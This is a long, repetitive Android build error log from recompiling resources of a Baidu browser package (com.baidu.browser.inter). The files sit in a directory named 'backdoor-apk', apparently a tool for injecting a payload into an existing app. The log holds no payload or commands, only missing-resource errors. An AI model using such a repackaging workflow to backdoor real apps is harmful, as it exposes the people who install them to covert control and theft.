/root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:73: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:74: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:57: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:59: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:61: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:77: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:78: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:80: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aw.xml:7: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aw.xml:7: error: No resource identifier found for attribute 'ringWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aw.xml:7: error: No resource identifier found for attribute 'maxBubbleCount' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aw.xml:7: error: No resource identifier found for attribute 'maxBubbleRadius' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ax.xml:4: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ax.xml:4: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ax.xml:4: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ax.xml:4: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ax.xml:4: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'backgroundStrokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:9: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'backgroundStrokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b0.xml:19: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'backgroundStrokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:9: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'backgroundStrokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b0.xml:19: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'outRingColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'innerRingColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'progressRingColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'progressRingWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:7: error: No resource identifier found for attribute 'innerGap' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'backgroundStrokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b3.xml:20: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b5.xml:2: error: Error: No resource found that matches the given name (at 'style' with value '@style/clearToolScrollTabItemStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b7.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b8.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b8.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b8.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b8.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b8.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b8.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b9.xml:2: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b9.xml:2: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b_.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/refreshhead'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/b.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/loadmore'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/refreshhead'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/b.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/load_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'drag_scroll_start' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'max_drag_scroll_speed' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'float_background_color' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'remove_mode' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'float_alpha' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'slide_shuffle_speed' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'drop_animation_duration' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'drag_enabled' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'remove_enabled' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'drag_start_mode' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'drag_handle_id' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bd.xml:6: error: No resource identifier found for attribute 'click_remove_id' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'drag_scroll_start' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'max_drag_scroll_speed' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'float_background_color' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'remove_mode' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'float_alpha' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'slide_shuffle_speed' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'drop_animation_duration' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'drag_enabled' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'remove_enabled' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'drag_start_mode' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'drag_handle_id' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bd.xml:6: error: No resource identifier found for attribute 'click_remove_id' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bi.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bi.xml:22: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bi.xml:24: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bi.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bi.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bi.xml:22: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bi.xml:24: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bi.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bm.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bm.xml:24: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bm.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bm.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bm.xml:24: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bm.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bn.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bn.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bn.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bn.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bn.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bn.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bn.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bn.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bo.xml:8: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bo.xml:8: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bq.xml:7: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bq.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/CustomCheckboxTheme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bq.xml:7: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bq.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/CustomCheckboxTheme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bu.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bu.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bw.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bw.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bw.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bw.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/bx.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/bx.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/fileexploreProgressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:42: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:31: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:32: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:33: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c.xml:34: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:42: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:31: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:32: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:33: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/c.xml:34: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'progress' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'progressColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'backgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'progressBackgroundColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'strokeWidth' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:42: error: No resource identifier found for attribute 'startAngle' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolFunctionBtnStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:31: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:32: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:33: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/c.xml:34: error: Error: No resource found that matches the given name (at 'style' with value '@style/cleanToolCleanChoiseCheckBoxStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/c8.xml:8: error: No resource identifier found for attribute 'animColor' in package 'com.baidu.browser.inter' W: W: 